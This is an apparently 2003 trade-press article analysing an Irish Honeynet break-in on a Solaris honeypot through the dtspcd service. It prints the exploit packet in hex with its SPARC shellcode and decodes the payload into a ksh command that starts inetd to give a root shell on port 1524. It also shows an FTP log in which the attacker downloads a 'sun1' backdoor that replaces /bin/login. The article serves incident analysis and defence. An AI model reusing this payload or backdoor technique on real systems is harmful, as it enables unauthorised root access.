Safety in Unix – Think again!

Pro

1 April 2005

We all know and understand that virus scanning software is a critical component in any computer network. We can see the sense in scanning e-mails and Internet traffic at the gateway, and it is clear that more and more Irish companies are adopting this approach. But with recent coverage of viruses and security breaches honing in on problems inherent in the Windows operating system, the importance of patching and patch management once again reared its ugly head. As system administrators scampered for cover, they were probably asking, ‘will there be an end’?

In August 2003, the Irish Honeynet, in an attempt to demonstrate that while we all feel frustrated with the recent problems in the Microsoft software, it is nonetheless still only one of an ever increasing number of operating systems that are vulnerable to the perils of the blackhats. Alan Neville, our honeynet whiz kid, recently conducted an analysis of a compromised Sun Solaris honeypot. What follows is a technical analysis that clearly demonstrates the need to focus our security efforts on systems of all shapes and sizes. All software has vulnerabilities. All software needs to be maintained and patched.

The Sun Solaris honeypot was online for three weeks before a hacker managed to compromise the dtspcd service, a Motif-based graphical user environment for Unix systems, using a well-known and publicly available exploit. The exploit looks as follows:

0x0000   4500 05dc a1ac 4000 3006 241c d03d 01a0        E…..@.0.$..=..
0x0010   ac10 0166 0e08 17e0 fee2 c115 5f66 192f        …f…….._f./
0x0020   8018 3ebc e1e9 0000 0101 080a 1ba7 dffb        ..>………….
0x0030   003f 7548 3030 3030 3030 3032 3034 3130        .?uH000000020410
0x0040   3365 3030 3031 2020 3420 0000 0031 3000        3e0001..4….10.
0x0050   801c 4011 801c 4011 1080 0101 801c 4011         .@…@…….@.
0x0060   801c 4011 801c 4011 801c 4011 801c 4011        ..@…@…@…@.
0x0070   801c 4011 801c 4011 801c 4011 801c 4011        ..@…@…@…@.
0x0080   801c 4011 801c 4011 801c 4011 801c 4011        ..@…@…@…@.

The ‘@’ symbols above, known as NOP slides, are used as intrusion code for the Sparc architecture. A NOP slide is a clever means of padding the buffer in an exploit where it is not immediately known where the code of execution will begin. This is quite a common technique and allows an attacker to launch an attack where a degree of uncertainty exists. The actual code executed looks as follows:

[beginning of packet removed due to NOP slides]
0x04d0    801c 4011 801c 4011 801c 4011 801c 4011         ..@…@…@…@.
0x04e0    801c 4011 801c 4011 801c 4011 801c 4011         ..@…@…@…@.
0x04f0    20bf ffff 20bf ffff 7fff ffff 9003 e034         ……………4
0x0500    9223 e020 a202 200c a402 2010 c02a 2008         .#………..*..
0x0510    c02a 200e d023 ffe0 e223 ffe4 e423 ffe8         .*…#…#…#..
0x0520    c023 ffec 8210 200b 91d0 2008 2f62 696e         .#………./bin
0x0530    2f6b 7368 2020 2020 2d63 2020 6563 686f        /ksh….-c..echo
0x0540    2022 696e 6772 6573 6c6f 636b 2073 7472         .”ingreslock.str
0x0550    6561 6d20 7463 7020 6e6f 7761 6974 2072         eam.tcp.nowait.r
0x0560    6f6f 7420 2f62 696e 2f73 6820 7368 202d         oot./bin/sh.sh.-
0x0570    6922 3e2f 746d 702f 783b 2f75 7372 2f73         i”>/tmp/x;/usr/s
0x0580    6269 6e2f 696e 6574 6420 2d73 202f 746d         bin/inetd.-s./tm
0x0590    702f 783b 736c 6565 7020 3130 3b2f 6269         p/x;sleep.10;/bi
0x05a0    6e2f 726d 202d 6620 2f74 6d70 2f78 2041         n/rm.-f./tmp/x.A
0x05b0    4141 4141 4141 4141 4141 4141 4141 4141         AAAAAAAAAAAAAAAA
0x05c0    4141 4141 4141 4141 4141 4141 4141 4141         AAAAAAAAAAAAAAAA
0x05d0    4141 4141 4141 4141 4141 4141                         AAAAAAAAAAAA

For the faint hearted, this translates to the following:

./bin/ksh -c echo “ingreslock stream tcp nowait root /bin/sh sh -i”/tmp/x;/usr/sbin/inetd -s /tmp/x;sleep 10;/bin/rm -f /tmp/x

The exploit, using the Korn shell, creates a file within the /tmp directory called ‘x’. Within this file a inetd.conf style entry is created and the inet daemon is started using the file ‘/tmp/x’ as its configuration file. This spawns a root shell on the ingreslock port (1524/tcp). The attacker can simply connect to the system on this port and take full administrative control.

Once in control, the attacker established an ftp session to a host on the Internet. Using the network analysis tool Ethereal, it was possible to break the ftp session down for analysis.

220 ftp.xyz.netFTP server (Version wu-2.6.2(1) Tue  19 07:50:31 EST 2003) ready.
USER ftp
331 Guest login ok, send your complete e-mail address as password.
PASS a@
230 Guest login ok, access restrictions apply.
CWD pub
250 CWD command successful.
TYPE I
200 Type set to I.
PORT 172,16,1,102,130,234
200 PORT command successful.
RETR sun1
150 Opening BINARY mode data connection for sun1 (90544 bytes).
226 Transfer complete.
QUIT
221-You have transferred 90544 bytes in 1 files.
221-Total traffic for this session was 91042 bytes in 1 transfers.
221-Thank you for using the FTP service on ftp.xyz.net.
221 Goodbye.

It can be seen from the session above that the attacker downloaded a file named ‘sun1’. The attacker then quickly modified the files permissions and renamed it to /bin/login.

Again, using Ethereal, it was possible to determine that the sun1 binary was compiled on a SUN Operating System with all extra debugging information removed. Using the strings command, the following lines were noticed:

DISPLAY
/usr/lib/libfl.k
pirc
/bin/sh

We conducted a simple Google search using the keywords “DISPLAY and pirc” and we were quickly lead to the door of packetstormsecurity.org, a well known repository for hackers’ tools and exploits. We determined that ‘sun1’ is a backdoor program written in c code named ulogin.c.

Backdoors are sinister tools used by hackers to gain unauthorised and undetected access to computers. Our experience, like the incident described above, tells us that they are in widespread use and it is recommended to ensure that system logging is enabled to aid in their detection.

The Irish Honeynet, set up by Espion, Deloitte & Touche and Data Electronics in April 2002, is designed to imitate the Internet infrastructures commonly used by organisations, but it is ‘wired’ with detection sensors that capture all activity to and from the system. A Honeynet is not advertised in any way so any traffic to it from the Internet is suspicious by nature, as it arises from hackers who are deliberately attempting to identify and attack systems that are vulnerable.

14/10/2003

Read More:


Back to Top ↑

TechCentral.ie